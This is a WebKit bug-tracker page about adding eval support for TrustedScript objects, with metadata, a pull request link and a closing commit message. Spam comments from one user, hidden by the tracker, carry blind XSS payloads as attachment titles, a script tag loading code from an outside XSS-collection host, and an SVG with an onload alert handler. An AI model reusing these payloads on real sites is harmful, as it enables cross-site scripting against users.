273184 – Implement eval support for TrustedScript objects

Bug 273184 - Implement eval support for TrustedScript objects

Summary: Implement eval support for TrustedScript objects

Status:	RESOLVED FIXED

Alias:	None

Product:	WebKit
Classification:	Unclassified
Component:	JavaScriptCore (show other bugs)
Version:	Safari 17
Hardware:	Unspecified Unspecified

Importance:	P2 Normal
Assignee:	Luke Warlow

URL:
Keywords:	InRadar

Depends on:
Blocks:	267694
	Show dependency tree / graph

Reported:	2024-04-24 06:35 PDT by Luke Warlow
Modified:	2024-05-23 07:51 PDT (History)
CC List:	2 users (show)

See Also:	https://github.com/web-platform-tests/wpt/pull/45879

Attachments
'"><script src=https://xss.report/c/wananlife></script> (1.57 KB, image/svg+xml) 2024-04-30 05:37 PDT, wananlife	no flags	Details
'"><script src=https://xss.report/c/wananlife></script> (145 bytes, application/xml) 2024-04-30 05:44 PDT, wananlife	no flags	Details
hackerone wananlife (138 bytes, application/xml) 2024-04-30 05:51 PDT, wananlife	no flags	Details
hackerone wananlife (150 bytes, application/xml) 2024-04-30 05:54 PDT, wananlife	no flags	Details
hackerone wananlife (178 bytes, application/xml) 2024-04-30 05:57 PDT, wananlife	no flags	Details
hackerone wananlife (532 bytes, image/svg+xml) 2024-04-30 06:02 PDT, wananlife	no flags	Details
hackerone wananlife (411 bytes, image/svg+xml) 2024-04-30 06:05 PDT, wananlife	no flags	Details
Show Obsolete (6) View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Luke Warlow 2024-04-24 06:35:25 PDT

Implement support for evaluating the code string associated with TrustedScript objects.

See Stage 3 proposal https://tc39.es/proposal-dynamic-code-brand-checks/ for more details.

Comment 1 Luke Warlow 2024-04-24 07:44:05 PDT

Pull request: https://github.com/WebKit/WebKit/pull/27691

Comment 2 wananlife 2024-04-30 05:37:45 PDT Comment hidden (spam)

Created attachment 471215 [details]
'"><script src=https://xss.report/c/wananlife></script>

Comment 3 wananlife 2024-04-30 05:44:04 PDT Comment hidden (spam)

Created attachment 471216 [details]
'"><script src=https://xss.report/c/wananlife></script>

Comment 4 wananlife 2024-04-30 05:51:58 PDT Comment hidden (spam)

Created attachment 471217 [details]
hackerone wananlife

Comment 5 wananlife 2024-04-30 05:54:07 PDT Comment hidden (spam)

Created attachment 471218 [details]
hackerone wananlife

Comment 6 wananlife 2024-04-30 05:57:11 PDT Comment hidden (spam)

Created attachment 471219 [details]
hackerone wananlife

Comment 7 wananlife 2024-04-30 06:02:23 PDT Comment hidden (spam)

Created attachment 471220 [details]
hackerone wananlife

Comment 8 wananlife 2024-04-30 06:05:21 PDT Comment hidden (spam)

Created attachment 471221 [details]
hackerone wananlife

Comment 9 wananlife 2024-04-30 06:08:14 PDT Comment hidden (spam)

Comment on attachment 471221 [details]
hackerone wananlife

<svg onload="alert('hack wananlife from hackerone')" xmlns="http://www.w3.org/2000/svg" width="300" height="300" viewBox="0 0 300 300">
    <!-- 背景矩形 -->
    <rect width="100%" height="100%" fill="#f0f0f0" />

    <!-- 圆形 -->
    <circle cx="150" cy="150" r="100" fill="#3498db" />

    <!-- 抽象的线条 -->
    <line x1="50" y1="150" x2="250" y2="150" stroke="#2ecc71" stroke-width="5" />

    <!-- 矩形 -->
    <rect x="120" y="120" width="60" height="60" fill="#e74c3c" />

    <!-- 文本 -->
    <text x="50%" y="50%" font-size="20" text-anchor="middle" fill="#ffffff" dy=".3em">Tech SVG</text>
</svg>

Comment 10 Radar WebKit Bug Importer 2024-05-01 06:36:13 PDT

<rdar://problem/127357526>

Comment 11 EWS 2024-05-23 07:50:58 PDT

Committed 279194@main (5e0f9b3cfb2b): <https://commits.webkit.org/279194@main>

Reviewed commits have been landed. Closing PR #27691 and removing active labels.